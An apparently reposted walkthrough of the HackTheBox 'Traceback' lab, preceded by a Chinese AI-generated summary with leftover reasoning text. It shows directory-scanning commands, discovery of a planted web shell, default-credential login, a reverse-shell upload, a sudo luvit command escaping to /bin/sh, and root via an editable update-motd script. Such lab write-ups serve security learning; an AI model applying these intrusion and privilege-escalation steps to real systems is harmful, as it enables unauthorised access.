嗯,用户让我帮忙总结一下这篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要通读整篇文章,抓住主要步骤和关键点。 文章讲的是一个渗透测试的过程,分为几个步骤:首先是枚举,使用dirb和gobuster扫描目录;然后是利用GitHub上的webshell列表进行枚举,找到了mevk.php;接着通过猜测admin/admin的密码登录,上传shell获得meterpreter会话;最后是权限提升,通过sudo命令获取sysadmin权限,并利用update-motd脚本在下次登录时获取root权限。 总结的时候要涵盖这些关键点:枚举、找到webshell、上传shell、权限提升。同时要注意字数限制,所以需要简洁明了地表达每个步骤的结果。 可能的结构是:先说枚举和找到webshell,然后说上传shell获得会话,最后权限提升到root。这样既全面又简洁。 现在把这些点连贯地组织成一句话,确保不超过一百个字。 </think> 文章描述了一次渗透测试过程:通过目录扫描和自定义字典找到隐藏的WebShell(mevk.php),猜测默认密码登录后上传反向Shell获取Meterpreter会话。随后利用sudo命令提权至sysadmin,并通过修改update-motd脚本实现无交互式获取root权限。最终成功获得用户和root权限。 2026-3-20 05:11:7 Author: infosecwriteups.com(查看原文) 阅读量:4 收藏
Lets Scan >>
dirb http://10.10.10.181/ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o /home/MrRobot/Documents/Documents/BoxesHACK/Traceback/resultsenum
Lets google the apache ubuntu version.
Apache httpd 2.4.29 ((Ubuntu))
going back to something i noticed in the source page or the main page lets mention it
there was writting something that gave us a clue about what we are dealing with here which is :
<! — Some of the best web shells that you might need ;) →
so we have to hack the website using the webshell maybe?
or get a reverse connection with something similar.
Lets research something about this
Lets postpone it and use gobuster to try to use another wordlist instead of dirb.
gobuster dir -u http://10.10.10.181/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401 -o /home/MrRobot/Documents/Documents/BoxesHACK/Traceback/enumerationweb.txt3rd Step of the Process is
Exploitation and Examining With Different tools.
lets start.
nothing from ZAP
lets run Raccoon and see if we can get something….
raccoon 10.10.10.181
wait for results
nothing.
Get Cyb0rgBytes’s stories in your inbox
Join Medium for free to get updates from this writer.
I guess the standard steps doesn’t work lets try to do some OSINT on the target and try to get something useful
by looking at the main page’s sourcepage again we find something interesting :
by googling this sentence we link to a github page with web shells names , first idea came to my mind is make a list of these webshells for enumeration with gobuster.
https://github.com/TheBinitGhimire/Web-Shells
by running gobuster against this list , BINGO we can find the one url that will lead us to the target webpage
smevk.php
Press enter or click to view image in full size
by entering admin admin as credentials we could guess it easily.
we can login inside the main page
<div style=”width:100%;height:0;padding-bottom:178%;position:relative;”><iframe src=”https://giphy.com/embed/1k4svRPk1DGbB6xUb3" width=”100%” height=”100%” style=”position:absolute” frameBorder=”0" class=”giphy-embed” allowFullScreen></iframe></div><p><a href=”https://giphy.com/gifs/donnathomas-rodgers-instagram-1k4svRPk1DGbB6xUb3">via GIPHY</a></p>
after that it looks like we can upload a shell into the page so i uploaded the shell and got a reverse connection back with meterpreter BINGO , we got a shell :
Now we are listening :
lets upload the shell
and execute it!
Press enter or click to view image in full size
4th Step Of Penetration Session is
Privilege Escalation
by running sudo -l
we know that we can run luvit as systemadmin without a password
Press enter or click to view image in full size
we are now webadmin by running this command :
Sudo -u sysadmin /home/sysadmin/luvit -e ‘os.execute(“/bin/sh”)’we can escape to spawn as sysadmin.
WE GOT THE USER FLAG LETS MOVE ON >
Next lets get root …
i got pspy and i’ll place it in the /dev/shm directory to run it and check the running processes.
lets log to sysadmin via ssh maybe we can have a much clear idea of what are we dealing with here
by following these steps:
in our box :
by running pspy we could see the processes and monitor them in realtime
a process which caught my attention is update-motd
by going to the directory /var/backups/update-motd we can read the files there but we can’t edit them
so I decided to go to the original directory which has the files there and BOOM we can edit them.
by editing this file 00-header :
Press enter or click to view image in full size
lets add cat /root/root.txt and see if it works when we log in again
we can do many other stuff at this moment but will stick to this way.
by login in again to ssh we CAN get root , boom !
done.
What i learned from this box is that the foothold was a bit tricky to get , which involves a custom dictionary for enumeration but it was hinted out which all you need is a google search and some creativity and fast observing skills.
Creating the shell was pretty easy so was the foothold but the privesc is a bit interesting it involves an automatic script with update-motd.d script that initiate after 30 sec of every reboots of the system so basically after editing the header to cat /root/root.txt we could log of ssh and relogin after 30 sec we could see the flag when we login again.
That’s all for this writeup , See you in the NEXT ONES
Peace!
SoftAddict OUT
如有侵权请联系:admin#unsafe.sh